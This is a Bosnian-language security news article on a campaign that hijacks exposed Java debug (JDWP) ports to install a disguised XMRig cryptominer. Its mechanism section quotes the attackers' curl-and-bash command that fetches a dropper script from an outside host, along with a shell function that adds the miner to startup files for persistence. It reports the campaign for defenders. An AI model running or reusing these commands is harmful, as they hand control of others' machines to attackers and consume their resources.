Nova serija sajber napada usmjerena je na organizacije koje nehotice izlažu Java Debug Wire Protocol (JDWP) servere na internet. Hakeri iskoriste ovu zanemarenu ulaznu tačku za implementaciju sofisticiranog malicioznog softvera za rudarenje kriptovaluta.
JDWP, standardna značajka Java platforme, namijenjena je olakšavanju udaljenog otklanjanja grešaka omogućavajući programerima da pregledaju aplikacije uživo. Međutim, kada JDWP ostane dostupan na produkcijskim sistemima, često zbog pogrešne konfiguracije ili korištenja razvojnih zastavica u okruženjima uživo, postaje moćan vektor za daljinsko izvršavanje koda.
Pojava ove prijetnje obilježena je brzim ciklusima eksploatacije. U nekoliko viđenih incidenata, hakeri su uspjeli kompromitovati ranjive strojeve u roku od nekoliko sati od izlaganja.
Tok napada obično započinje masovnim internetskim skeniranjem otvorenih JDWP portova, najčešće porta 5005. Nakon identifikacije mete, haker inicira JDWP rukovanje kako bi potvrdio da je usluga aktivna, a zatim uspostavlja sesiju, stičući interaktivni pristup Java Virtual Machine (JVM). Ovaj pristup omogućava hakeru da nabroji učitane klase i poziva metode, što na kraju omogućava daljinsko izvršavanje naredbi na hostu.
Analitičari iz Wiz-a identificovali su ovu kampanju nakon praćenja pokušaja eksploatacije na njihovim honeypot serverima koji pokreću TeamCity, popularan CI/CD alat. Hakeri su pokazali visok stepen automatizacije i prilagođavanja, implementirajući modificirani XMRig kriptorudar sa kodiranom konfiguracijom kako bi izbjegli otkrivanje.
Značajno je da je maliciozni softver koristio posrednike rudarskih bazena kako bi prikrio adresu odredišnog novčanika, otežavajući napore za praćenje ili prekidanje nelegalne operacije rudarenja. Uticaj ovih napada je značajan. Zloupotrebom JDWP, hakeri ne samo da mogu implementirati kriptorudare, već i uspostaviti duboko uporište, manipulisati sistemskim procesima i potencijalno se proširiti na drugu imovinu unutar kompromitovanog okruženja. Skrivena priroda tereta, u kombinaciji sa njegovom sposobnošću da se uklopi u legitimne sistemske uslužne programe, povećava rizik od dugotrajnih nedetekovanih aktivnosti i iscrpljivanja resursa.
Fokusirajući se na mehanizam infekcije, hakeri iskorištavaju nedostatak autentifikacije JDWP-a kako bi ubrizgali i izvršili shell naredbe direktno putem protokola. Nakon uspostavljanja sesije, obično preuzimaju dropper skriptu – poput logservice.sh – koristeći naredbe kao što su:
curl -o /tmp/logservice.sh -s https://canonicalconnect[.]com/logservice.sh
bash /tmp/logservice.sh
Ova skripta je osmišljena da zaustavi konkurentske rudare, preuzme maliciozni XMRig binarni kod prerušen u logrotate i instalira ga u direktorij za konfiguraciju korisnika. Skripta zatim postavlja više mehanizama postojanosti, uključujući izmjenu datoteka za pokretanje shella, kreiranje cron poslova i instaliranje lažne sistemske usluge. Sljedeći izvadak ilustrira kako skripta osigurava postojanost putem konfiguracije shella:
add_to_startup() {
if [ -r “$1” ]; then
if ! grep -Fxq “$EXEC >/dev/null 2>&1” “$1”; then
echo “$EXEC >/dev/null 2>&1” >> “$1”
fi
fi
}
Lanac infekcije je i efikasan i otporan, omogućavajući kriptorudaru da preživi ponovno pokretanje i prijave korisnika. Korištenje naziva procesa i lokacija sistema koji zvuče legitimno od strane hakera dodatno komplikuje napore za otkrivanje i ispravljanje problema, naglašavajući potrebu za budnim upravljanjem konfiguracijom i robusnim nadzorom izloženih usluga.